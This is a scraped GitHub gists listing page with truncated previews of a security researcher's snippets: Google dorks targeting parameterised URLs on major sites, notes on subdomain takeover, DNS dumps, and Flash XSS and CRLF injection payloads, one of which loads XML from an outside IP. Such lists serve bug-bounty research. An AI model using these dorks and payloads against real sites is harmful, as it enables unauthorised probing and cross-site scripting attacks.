Robbie random-robbie
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 2.60.0.0-2.60.31.255 | |
| 2.60.32.0-2.60.63.255 | |
| 2.60.64.0-2.60.95.255 | |
| 2.60.96.0-2.60.127.255 | |
| 2.60.128.0-2.60.159.255 | |
| 2.60.160.0-2.60.191.255 | |
| 2.60.192.0-2.60.255.255 | |
| 2.61.0.0-2.61.31.255 | |
| 2.61.32.0-2.61.63.255 | |
| 2.61.64.0-2.61.95.255 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| site:*.Google.com inurl:'&' | |
| site:*.Youtube.com inurl:'&' | |
| site:*.Facebook.com inurl:'&' | |
| site:*.Baidu.com inurl:'&' | |
| site:*.Wikipedia.org inurl:'&' | |
| site:*.Yahoo.com inurl:'&' | |
| site:*.Google.co.in inurl:'&' | |
| site:*.Amazon.com inurl:'&' | |
| site:*.Qq.com inurl:'&' | |
| site:*.Google.co.jp inurl:'&' |
random-robbie
/ dork
Last active
March 15, 2017 15:19
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| site:"*.Bestbuy.com" inurl:"&" | |
| site:"*.Newegg.com" inurl:"&" | |
| site:"*.Sky.com" inurl:"&" | |
| site:"*.Directv.com" inurl:"&" | |
| site:"*.sony.com" inurl:"&" | |
| site:"*.Frys.com" inurl:"&" | |
| site:"*.Mobikwik.com" inurl:"&" | |
| site:"*.Tigerdirect.com" inurl:"&" | |
| site:"*.Siriusxm.com" inurl:"&" | |
| site:"*.Bose.com" inurl:"&" |
random-robbie
/ gist:bed43679388d375736783db5af815c66
Last active
January 14, 2017 09:41
easy subdomain take overs
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| redirect.feedpress.me | |
| amazon.com s3 bucket | |
| cloudfront | |
| https://hackerone-attachments.s3.amazonaws.com/production/000/099/783/16eb06434e26ae3c2873bb1e95e14ffd321bad32/vulnerable-cloudfront.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAJFXIS7KJADBA4QQA%2F20170114%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20170114T091439Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Signature=6d5bae042070c1180d7db66fdac5d59e22ad1562c846b61b6384a5587c1ea21c | |
| Heroku, Github, Bitbucket, Desk, Squarespace and Shopify |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| error_reporting(E_ALL); | |
| //ini_set('display_errors', 1); | |
| error_reporting(0); | |
| require __DIR__ . '/vendor/autoload.php'; | |
| use \Curl\Curl; | |
| #REQUIRES https://github.com/php-curl-class/php-curl-class so ensure you have composer | |
| #composer require php-curl-class/php-curl-class | |
| #NEEDS PHP-SSH2 installed and curl!! |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Finding DNS records for www.starbucks.com | |
| Array | |
| ( | |
| [0] => Array | |
| ( | |
| [host] => starbucks.com | |
| [class] => IN | |
| [ttl] => 14134 | |
| [type] => A | |
| [ip] => 107.162.135.91 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| player.swf?debug=alert%28'1'%29 | |
| /viewer.swf?xmlDataPath=http://45.55.162.179/vuln.xml | |
| link1=java script:alert(/1/) | |
| flashContentURL=javascript:alert(/1/) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| %0a%0d | |
| %0d is the carriage return character, and %0a is the linefeed character. |
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1Array | |
| ( | |
| [0] => Array | |
| ( | |
| [host] => *.cba.mit.edu | |
| [class] => IN | |
| [ttl] => 3599 | |
| [type] => A | |
| [ip] => 18.85.8.54 | |
| ) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env bash | |
| # names of latest versions of each package | |
| export NGINX_VERSION=1.13.3 | |
| export VERSION_PCRE=pcre-8.39 | |
| export VERSION_LIBRESSL=libressl-2.5.0 | |
| export VERSION_NGINX=nginx-$NGINX_VERSION | |
| export NPS_VERSION=1.11.33.0 | |
| export VERSION_PAGESPEED=v${NPS_VERSION}-beta | |